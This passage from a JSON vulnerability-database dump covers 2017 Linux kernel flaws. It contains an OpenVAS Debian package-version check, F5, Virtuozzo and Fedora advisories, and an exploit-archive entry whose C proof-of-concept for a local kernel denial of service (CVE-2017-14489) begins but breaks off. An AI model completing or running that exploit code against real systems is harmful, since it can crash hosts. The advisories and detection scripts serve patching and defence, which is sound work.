disclosure,\ndenial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\nAn integer overflow vulnerability in the ip6_find_1stfragopt()\nfunction was found allowing a local attacker with privileges to open\nraw sockets to cause a denial of service.\n\nCVE-2017-7889\n\nTommi Rantala and Brad Spengler reported that the mm subsystem does\nnot properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\nallowing a local attacker with access to /dev/mem to obtain\nsensitive information or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.93-1. This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-armel\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-armhf\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-all-i386\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-common\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-common-rt\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-3.2.0-5-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-486\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-iop32x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-ixp4xx\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-kirkwood\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-mv78xx0\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-mx5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-omap\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-orion5x\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-686-pae-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-rt-amd64-dbg\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-versatile\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-3.2.0-5-vexpress\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-3.2.0-5\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-5-686-pae\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-5-amd64\", ver:\"3.2.93-1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-05-08T18:21:23", "bulletinFamily": "software", "cvelist": ["CVE-2017-14489"], "description": "\nF5 Product Development has assigned ID Installer-3041 (Traffix) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2017-10-04T00:57:00", "published": "2017-10-04T00:57:00", "id": "F5:K71796229", "href": "https://support.f5.com/csp/article/K71796229", "title": "Linux kernel vulnerability CVE-2017-14489", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. The patch applies to Virtuozzo kernel 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0).\n**Vulnerability id:** PSBM-72405\nAn unprivileged user inside a container could cause a denial of service (kernel crash in user_read() function) using a specially crafted sequence of system calls.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 1, "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "VZA-2017-082", "href": "https://help.virtuozzo.com/customer/portal/articles/2878782", "title": "Important kernel security update: CVE-2017-14489 and other; Virtuozzo ReadyKernel patch 31.1 for Virtuozzo 7.0.0", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-05T11:28:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3), and 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** PSBM-71747\nChunYu Wang from Red Hat found a netlink use-after-free issue by syzkaller. Access to already freed memory (groups in struct netlink_sock) could cause host crash or memory corruption.\n\n**Vulnerability id:** PSBM-72405\nAn unprivileged user inside a container could cause a denial of service (kernel crash in user_read() function) using a specially crafted sequence of system calls.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 1, "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "VZA-2017-083", "href": "https://help.virtuozzo.com/customer/portal/articles/2878783", "title": "Important kernel security update: CVE-2017-14489 and other; Virtuozzo ReadyKernel patch 31.1 for Virtuozzo 7.0.1, 7.0.3, 7.0.4, 7.0.4 HF3, 7.0.5", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-04T16:40:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000251"], "description": "This update provides the new kernel 2.6.32-042stab125.1 for Virtuozzo 6.0 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.10.2.el6. This update inherits a security fix from the original RHEL kernel and provides internal security fixes.\n**Vulnerability id:** PSBM-72416\nKernel crash due to missing error handling for negatively instantiated keys.\n\n**Vulnerability id:** CVE-2017-1000251\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 2, "modified": "2017-09-26T00:00:00", "published": "2017-09-26T00:00:00", "id": "VZA-2017-085", "href": "https://help.virtuozzo.com/customer/portal/articles/2880187", "title": "Important kernel security update: CVE-2017-1000251 and other; new kernel 2.6.32-042stab125.1, Virtuozzo 6.0 Update 12 Hotfix 15 (6.0.12-3684)", "type": "virtuozzo", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T16:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000251"], "description": "This update provides the new kernel 2.6.32-042stab125.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.10.2.el6. This update inherits a security fix from the original RHEL kernel and provides internal security fixes.\n**Vulnerability id:** PSBM-72416\nKernel crash due to missing error handling for negatively instantiated keys.\n\n**Vulnerability id:** CVE-2017-1000251\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-14489\nThe iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.\n\n", "edition": 2, "modified": "2017-09-26T00:00:00", "published": "2017-09-26T00:00:00", "id": "VZA-2017-084", "href": "https://help.virtuozzo.com/customer/portal/articles/2880186", "title": "Important kernel security update: CVE-2017-1000251 and other; new kernel 2.6.32-042stab125.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T16:41:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000251", "CVE-2017-1000253", "CVE-2017-12154"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4), 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3), and 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-1000253\nA flaw was found in the way the Linux kernel loaded ELF executables. Provided that an application was built as Position Independent Executable (PIE), the loader could allow part of that application's data segment to map over the memory area reserved for its stack, potentially resulting in memory corruption. An unprivileged local user with access to SUID (or otherwise privileged) PIE binary could use this flaw to escalate their privileges on the system.\n\n**Vulnerability id:** CVE-2017-1000251\nA stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-12154\nThe prepare_vmcs02 function in arch/x86/kvm/vmx.c in the Linux kernel through 4.13.3 does not ensure that the 'CR8-load exiting' and 'CR8-store exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR shadow' vmcs12 control, which allows KVM L2 guest OS users to obtain read and write access to the hardware CR8 register.\n\n", "edition": 2, "modified": "2017-09-28T00:00:00", "published": "2017-09-28T00:00:00", "id": "VZA-2017-086", "href": "https://help.virtuozzo.com/customer/portal/articles/2881453", "title": "Kernel security update: CVE-2017-1000253; Virtuozzo ReadyKernel patch 32.1 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The kernel meta package ", "modified": "2017-09-17T22:52:47", "published": "2017-09-17T22:52:47", "id": "FEDORA:9526C6075D89", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.12.13-300.fc26", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The kernel meta package ", "modified": "2017-09-22T05:23:22", "published": "2017-09-22T05:23:22", "id": "FEDORA:8CACD6083B5B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.12.13-200.fc25", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-09T03:07:12", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2017-10-02T00:00:00", "title": "Linux Kernel < 4.14.rc3 - Local Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "href": "https://0day.today/exploit/description/28714", "id": "1337DAY-ID-28714", "sourceData": "# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service\r\n# Exploit Author: Wang Chenyu (Nanyang Technological University)\r\n# Version:Linux kernel 4-14-rc1\r\n# Tested on:Ubuntu 16.04 desktop amd64\r\n# CVE : CVE-2017-14489\r\n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and\r\ndiscovered by Syzkaller. Provided for legal security research and testing\r\npurposes ONLY.\r\nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err\r\n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >\r\nnlh->nlmsg_len.\r\n\r\n\r\nPOC:\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n#define NETLINK_USER 31\r\n\r\n#define MAX_PAYLOAD 1024 /* maximum payload size*/\r\nstruct sockaddr_nl src_addr, dest_addr;\r\nstruct nlmsghdr *nlh = NULL;\r\nstruct iovec iov;\r\nint sock_fd;\r\nstruct msghdr msg;\r\n\r\nint main()\r\n{\r\nsock_fd=socket(PF_NETLINK, SOCK_RAW, 